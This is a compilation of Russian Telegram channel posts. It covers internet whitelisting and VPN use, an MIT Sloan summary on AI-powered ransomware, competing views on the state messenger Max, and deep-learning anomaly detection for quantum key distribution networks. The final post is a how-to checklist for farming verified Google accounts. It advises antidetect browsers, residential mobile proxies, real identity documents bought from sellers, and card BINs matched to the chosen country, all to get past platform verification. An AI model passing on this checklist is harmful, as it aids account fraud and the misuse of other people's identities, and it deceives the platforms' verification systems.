Новости становления чебурнета!Сайт букмекерской конторы "Фонбет" попал в "белый список" ресурсов, которые будут работать даже при отключении интернета. То есть, ребята, гуглить и знать информацию вам нельзя, а в лудоманию можно. Сиди голодный, неработающий, ничего не знающий, крути рулетку. Не думай. "Белый список" — еще один шаг к так называемому чебурнету", при котором доступ к "неправильным" сайтам будет осложнен в разы.Эксперты уже поясняют: скорее всего, в белый список внесут не приложения, а сетевые маршруты. Сначала это создаст большие проблемы с обходом блокировок, но потом появятся решения — например, многоуровневые и многоступенчатые VPN-сервисы или другие технические методы. Так происходило в Китае и Иране: люди находили способы выхода за пределы ограниченной сети.⚠️ Что делать пользователям уже сейчас:🔺Использовать VPN — это законно в России, никакого запрета на их применение нет;🔺 Ставить сразу несколько проверенных VPN-сервисов и следить за их обновлениями;🔺Сохранять в закладках и на устройствах инструкции по настройке альтернативных способов доступа (Tor, прокси и т. д.);🔺Подписываться на независимые источники информации в соцсетях и мессенджерах, чтобы не потерять доступ к новостям.Интернет в России меняется, но право на доступ к информации и приватность остается за нами.
Машинное обучение RU
🔒 MIT Sloan: 80% современных атак с выкупом работают на ИИ ИИ стал главным оружием киберпреступников: - LLM штампуют фишинговые письма и вредоносный код - Голосовое клонирование подделывает звонки «от босса» или службы поддержки - Автоматизация ломает пароли и обходит CAPTCHA в разы быстрее 🚨 Что это значит для бизнеса: - Простых обновлений и ручного мониторинга уже недостаточно - Системы должны сами лечить уязвимости и держать оборону 24/7 - «Zero trust» — новый стандарт: доверять нельзя никому, даже внутренним запросам 🛡 Три уровня защиты будущего: 1. Automation — авто-патчи и самовосстановление кода 2. Autonomous & deceptive defense — движущаяся цель + фейковые ловушки для хакеров 3. Augmented oversight — онлайн risk-score, прогноз ущерба и отчётность для руководителей ИИ ускорил атаки — но он же помогает строить умную, автономную защиту. 🔗 MIT Sloan Report: https://mitsloan.mit.edu/ideas-made-to-matter/80-ransomware-attacks-now-use-artificial-intelligence #AI #Cybersecurity #Ransomware #ZeroTrust #MIT
Пролетарии всех стран
Про мессенджер Макс: государство за всеми следит! (с)Вечный перевод стрелок на государство, которое постоянно всем все должно-привычка, берущая начало из нашего советского прошлого. Вот там государство владело всеми средствами производства, оно же определяло экономический план и рынки сбыта, оно же обеспечивало всех базой жизни-так как свободного движения денег не было и пойти и купить эту базу за деньги было невозможно, и государство же определяло идеологические нарративы, то есть повестку. В ночных кошмарах либералов оно же всех еще гробило и за всеми непрестанно следило) Но, друзья, СССР закончился 34 года назад, на дворе давно капитализм. Сегодня никакое государство ничего никому не должно кроме обеспечения тех функций, который каждый гражданин не может выполнить отдельно, а именно: оборонка (границы и армия), социалка- для уязвимых лиц (инвалиды, ветераны, семьи погибших) или в базовых сферах (среднее школьное образование, вакцинация), а также работа политической и законодательной системы. Все) Хорошее образование, красивые квартиры, машины, нарядные платные стоматологические кабинеты, воспитание и обеспечение детей- все это в капитализме вы делаете сами на свои заработанные деньги, с которых уплачен налог- как это делают люди во всем мире, у которых под жпй нет бабушкиных советских квартир, дач, халявных дипломов и прочих плюшек.Однако, нарратив «государство плохое» так здорово крутили последние 30 лет нко, usaid и дед Сорос в нашем информационном поле, что у нас выросли целые поколения, которым бы в реальный рынок деньги производить и за них все себе покупать, а они по-прежнему сидят на куче бесплатной или очень дешевой базе «от государства» и пишут в интернете вот это: «государство хочет из нас сделать крепостных». Да кому ты обос*алась (с))))На этом нарративе отлично заходят и свежие новости-в частности, про мессенджер Макс, который качают все, кому не лень- от Медузы до сеточных блогеров. Я даж завидую вершинам самооценки каждого пишущего, где вся вот эта машинерия национальная крутится вокруг отдельных Вась, именно для слежки за которыми все это и затевалось)) Давайте подумаем, однако, хорошенько о проблеме. Макс создан как национальный мессенджер, потому что У ЛЮБОЙ страны, которая хочет на международной арене что-то значить, всегда есть свои национальные средства связи-ибо суверенитет начинается в том числе с этого (и не зря в 1917 году большевики помимо Зимнего, банка и вокзала брали главпочтамт)). Норм так, что страна, посягающая наконец на крепкое место в международной политике, сидит на мессенджерах Мета и каких-то неконтролируемых людей с зажатыми в Париже эээ.. ну тем самым?)) Для примера: в США вся пользовательская связь делится между айфоном, который поставляется в жесткой привязке к покупке номера, а к нему так же безапелляционно предлагается аймесседж (и это 70% людей всей страны-на стекле под микроскопом крупного капитала) и андроидом, у которого стоит вацап-упс, принадлежащий американской корпорации Мета🤣молчу про то, что андроиды на американский рынок поставляет преимущественно Южная Корея-любимый вассал США, на территории которой находится больше всего военных баз НАТО в мире)))Понимаю, современный культ индивидуализма мешает думать о великом. Но если подумать только о своем, то и тут выясняется, что пока все боятся Макса, их данные 24/7 сканируют крупные корпорации: соцсети, поисковые системы, навигаторы, сервисы доставки еды, онлайн-магазины, стриминги, порно сайты, мессенджеры, фитнес-трекеры, умные колонки, банковские сервисы, программы лояльности, онлайн-игры, сервисы бронирования, такси и каршеринг, почтовые сервисы, интернет-провайдеры, мобильные операторы, системы видеонаблюдения, приложения для здоровья… мне продолжать?)))))Да, они собирают наши данные, модели поведения, эмоции, идеи, мысли, и на основании этого создают рынок сбыта, производя на этом прибыль. А потребитель -нет) Так что конечно Макс будет за вами следить-если понадобится. Но к сожалению большинство из нас Максу не нужны. А вот ваш айфон сидит и слушает вас в этот момент. Как там, не страшно?))))
Хроники абсурда
​​Макс и козлыПохоже, в Кремле сообразили, что «отмазать» нацмессенджер Макс уже не получится – даже детям понятно, что всё в нем будут читать и слушать в режиме онлайн «компетентные органы». Да и байка про невероятную защищенность и безопасность «зашла» только пенсионерам, которых теперь успешно разводят и через Макс.Что делать в такой ситуации? Правильно, включать режим «Ну да, мы козлы! Но вокруг посмотрите! Все ведь козлы, не мы одни!» В советской практике этот нехитрый риторический прием назывался «а у вас в Америке вообще негров линчуют».Только в современной России он, как и многое, возведен в абсолют и доведен до абсурда. США Югославию бомбили? Бомбили. Ну так а че, какие претензии? Или закон об иноагентах есть в Америке вашей? Есть. Ну и все.С Махом получается аналогично – уже целый г-н Песков де-факто, пусть и с экивоками, признал, что мошенники прекрасно пользуют и «защищенный» госмессенджер. То есть разницы, в общем-то, нет – то вас дурили в ватсапе, теперь – в Махе. Но лучше берите отечественное, оно удобнее.Или взять прослушку – сегодня Дмитрий Сергеевич прямо заявил, что абсолютно все мессенджеры есть «прозрачная система» для спецслужб. Иными словами, чего вы ноете, что Макс будут слушать – мы и так все слушаем, что в телеге, что в ватсапе. Изощренная логика, если не сказать извращенная.Но что остается, если убедить в надежности и безопасности госмессенджера не выходит? Приходится рассказывать электорату, что все мессенджеры небезопасное говно, а не только российский.Вопрос, правда, возникает – зачем же в 2018 году так истерично было требовать у телеграма ключи шифрования, а в 2024-м блокировать Сигнал с его технологией end-to-end шифрования? Читали бы молча и все дела, раз у вас все так «прозрачно».@Хроники абсурда
ПРОквант
💻 Нейросеть научили обнаруживать атаки на системы квантового распределения ключей     Китайские ученые создали систему безопасности на основе глубокого обучения, которая выявляет аномалии в каналах связи на основе квантового распределения ключей. Она распознает даже неизвестные угрозы, не требуя при этом изменения инфраструктуры. Новая разработка повышает безопасность и практичность КРК-сетей.  Как сообщает издание Quantum Zeitgeist,  исследователи представили новую систему безопасности для КРК-сетей, основанную на обнаружении аномалий – методе, заимствованном из машинного обучения. Вместо того, чтобы идентифицировать конкретные атаки, такая система с помощью глубокого обучения изучает, как выглядит и характеризуется стабильная работа сети на основе КРК. Затем система безопасности отмечает любые отклонения от этого базового сценария и считает их потенциально вредоносными. При таком подходе пропустить атаку практически невозможно. Отметим, что для защиты КРК-сетей традиционными методами (изменение характеристик детекторов,  создание протоколов с состояниями-ловушками и др.) часто требуется внедрение изменений в аппаратуру. Это повышает затраты на поддержку работы сети и может привести к появлению новых уязвимостей. Китайская модель обнаружения аномалий на базе алгоритма Deep SVDD обучается только на данных стабильной работы КРК. С помощью глубокого обучения она строит гиперсферу относительно допустимых значений параметров, а все отклонения помечает как потенциальные атаки.  В ходе тестирования «аномальными» атаками стали возникать изменения параметров калибровки и подавление сигнала. Система, после обучения на нормальной работе, обнаружила больше 99% таких атак. Авторы также утверждают, что модель стабильна и находит в том числе неизвестные атаки, не требуя их идентификации или распознавания. Кроме того, она масштабируется и её можно интегрировать в существующие сети, включая спутниковые.  Ознакомиться с первоисточником#мировой_опыт #информационная_безопасность #ИИИзображение: Andrey Suslov/Shutterstock/FOTODOM
📱Про Mobile | Lukos Apps
Как делать рабочие физические аккаунтыНаш сетап я палить, разумеется, не буду. Но можете использовать как чеклист.1. Девайс и антик. Чтобы представители антиков не голосили - любой из них протекает. Какой-то больше, какой-то меньше. Но это данность. Все мы ловили разлогины или вылеты на смс, хотя казалось бы, нет причин. А все благодаря протечкам. Чтобы этого избежать - дружно переходим на MAC от M1 и выше процессоры. При этом, важно еще и не накосячить с настройками антика, там тоже много мелочей, на которые стоит обращать внимание. Желательно, чтобы вообще вся команда, кто заходит в профиль антика, сидела на одних и тех же устройствах.2. Прокси. Самый простой способ понять, что ваша прокся говно - это нужно ли, сидя в России, использовать VPN для открытия Google Play или нет. От популярных сервисов держимся подальше. У нас мобильные прокси конкретных людей, которые проживают в целевом гео.3. Гео. Не используйте заюзанные гео - USA/UK and e.t.c. Найдите себе доки и прокси, в какой нибудь Андорре и радуйтесь жизни. Ее большинство на карте не найдет, а это европка.4. Доки. Тут сложнее всего. С одной стороны «ненастоящие» доки проходят. а с другой выпаливает. Лучше использовать настоящие. Но всегда держим в голове, что селлер - мразь и гонит их в десятки рук. Значит, надо найти свой источник. При этом, доки также, стоит использовать не самые очевидные. Паспорта и ид карты - нафиг. 5. Платега и бин должны соответствовать гео. Сетап - геморный. Под продажу такое не пустишь, сразу скоммуниздят все переменные, которые долго перебирать. Для меня один из показателей, что все ок - это если мы создаем профиль, без нагула куки и тд, идем регать gmail, и он создается без требования номера. При этом, никто не мешает использовать доки одной страны, платеги другой, а прокси Уганды. Вообще, в принципе, можете делать че хотите, главное чтобы работало😁. Но надежнее всего - полное совпадение.Вообще, неплохо картину мира дополняет пообщаться с теми, кто активно заливает гугл адс. Можно на основе их проблем и их решения, понатягивать сову на глобус и провести аналогию с Google Play.